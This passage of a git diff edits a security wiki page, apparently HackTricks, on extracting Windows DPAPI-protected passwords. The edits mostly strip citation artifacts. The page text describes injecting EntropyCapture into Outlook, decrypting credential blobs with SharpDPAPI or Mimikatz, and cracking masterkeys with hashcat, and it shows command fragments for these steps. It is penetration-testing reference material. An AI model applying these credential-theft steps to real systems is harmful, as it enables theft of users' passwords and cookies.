scope the **“Supply in the request”** option on all templates; prefer explicitly defined SAN/EKU values. * Remove **Any Purpose** or **No EKU** from templates unless absolutely required (addresses ESC2 scenarios). * Require **manager approval** or dedicated Enrollment Agent workflows for sensitive templates (e.g., WebServer / CodeSigning). diff --git a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md index d77dd1884ba..eab8383d3cd 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md +++ b/src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md @@ -267,7 +267,7 @@ SharpDPAPI.exe blob /target:C:\path\to\encrypted\file /unprotect Some applications pass an additional **entropy** value to `CryptProtectData`. Without this value the blob cannot be decrypted, even if the correct masterkey is known. Obtaining the entropy is therefore essential when targeting credentials protected in this way (e.g. Microsoft Outlook, some VPN clients). -[**EntropyCapture**](https://github.com/SpecterOps/EntropyCapture) (2022) is a user-mode DLL that hooks the DPAPI functions inside the target process and transparently records any optional entropy that is supplied. Running EntropyCapture in **DLL-injection** mode against processes like `outlook.exe` or `vpnclient.exe` will output a file mapping each entropy buffer to the calling process and blob. The captured entropy can later be supplied to **SharpDPAPI** (`/entropy:`) or **Mimikatz** (`/entropy:`) in order to decrypt the data. citeturn5search0 +[**EntropyCapture**](https://github.com/SpecterOps/EntropyCapture) (2022) is a user-mode DLL that hooks the DPAPI functions inside the target process and transparently records any optional entropy that is supplied. Running EntropyCapture in **DLL-injection** mode against processes like `outlook.exe` or `vpnclient.exe` will output a file mapping each entropy buffer to the calling process and blob. The captured entropy can later be supplied to **SharpDPAPI** (`/entropy:`) or **Mimikatz** (`/entropy:`) in order to decrypt the data. ```powershell # Inject EntropyCapture into the current user's Outlook @@ -280,7 +280,7 @@ SharpDPAPI.exe blob /target:secret.cred /entropy:entropy.bin /ntlm: ### Cracking masterkeys offline (Hashcat & DPAPISnoop) -Microsoft introduced a **context 3** masterkey format starting with Windows 10 v1607 (2016). `hashcat` v6.2.6 (December 2023) added hash-modes **22100** (DPAPI masterkey v1 context ), **22101** (context 1) and **22102** (context 3) allowing GPU-accelerated cracking of user passwords directly from the masterkey file. Attackers can therefore perform word-list or brute-force attacks without interacting with the target system. citeturn8search1 +Microsoft introduced a **context 3** masterkey format starting with Windows 10 v1607 (2016). `hashcat` v6.2.6 (December 2023) added hash-modes **22100** (DPAPI masterkey v1 context ), **22101** (context 1) and **22102** (context 3) allowing GPU-accelerated cracking of user passwords directly from the masterkey file. Attackers can therefore perform word-list or brute-force attacks without interacting with the target system. `DPAPISnoop` (2024) automates the process: @@ -319,11 +319,11 @@ With extracted from LDAP computers list you can find every sub network even if y * Parallel collection of blobs from hundreds of hosts * Parsing of **context 3** masterkeys and automatic Hashcat cracking integration * Support for Chrome "App-Bound" encrypted cookies (see next section) -* A new **`--snapshot`** mode to repeatedly poll endpoints and diff newly-created blobs citeturn1search2 +* A new **`--snapshot`** mode to repeatedly poll endpoints and diff newly-created blobs ### DPAPISnoop -[**DPAPISnoop**](https://github.com/Leftp/DPAPISnoop) is a C# parser for masterkey/credential/vault files that can output Hashcat/JtR formats and optionally invoke cracking automatically. It fully supports machine and user masterkey formats up to Windows 11 24H1. citeturn2search0 +[**DPAPISnoop**](https://github.com/Leftp/DPAPISnoop) is a C# parser for masterkey/credential/vault files that can output Hashcat/JtR formats and optionally invoke cracking automatically. It fully supports machine and user masterkey formats up to Windows 11 24H1. ## Common detections @@ -337,19 +337,19 @@ With extracted from LDAP computers list you can find every sub network even if y --- ### 2023-2025 vulnerabilities & ecosystem changes -* **CVE-2023-36004 – Windows DPAPI Secure Channel Spoofing** (November 2023). An attacker with network access could trick a domain member into retrieving a malicious DPAPI backup key, allowing decryption of user masterkeys. Patched in November 2023 cumulative update – administrators should ensure DCs and workstations are fully patched. citeturn4search0 -* **Chrome 127 “App-Bound” cookie encryption** (July 2024) replaced the legacy DPAPI-only protection with an additional key stored under the user’s **Credential Manager**. Offline decryption of cookies now requires both the DPAPI masterkey and the **GCM-wrapped app-bound key**. SharpChrome v2.3 and DonPAPI 2.x are able to recover the extra key when running with user context. citeturn0search0 +* **CVE-2023-36004 – Windows DPAPI Secure Channel Spoofing** (November 2023). An attacker with network access could trick a domain member into retrieving a malicious DPAPI backup key, allowing decryption of user masterkeys. Patched in November 2023 cumulative update – administrators should ensure DCs and workstations are fully patched. +* **Chrome 127 “App-Bound” cookie encryption** (July 2024) replaced the legacy DPAPI-only protection with an additional key stored under the user’s **Credential Manager**. Offline decryption of cookies now requires both the DPAPI masterkey and the **GCM-wrapped app-bound key**. SharpChrome v2.3 and DonPAPI 2.x are able to recover the extra key when running with user context. ## References -- https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13 -- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c -- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36004 -- https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html -- https://specterops.io/blog/2022/05/18/entropycapture-simple-extraction-of-dpapi-optional-entropy/ -- https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6 -- https://github.com/Leftp/DPAPISnoop -- https://pypi.org/project/donpapi/2.0.0/ +- [https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13](https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13) +- [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c) +- [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36004](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36004) +- [https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html) +- [https://specterops.io/blog/2022/05/18/entropycapture-simple-extraction-of-dpapi-optional-entropy/](https://specterops.io/blog/2022/05/18/entropycapture-simple-extraction-of-dpapi-optional-entropy/) +- [https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6](https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6) +- [https://github.com/Leftp/DPAPISnoop](https://github.com/Leftp/DPAPISnoop) +- [https://pypi.org/project/donpapi/2.0.0/](https://pypi.org/project/donpapi/2.0.0/) {{#include ../../banners/hacktricks-training.md}}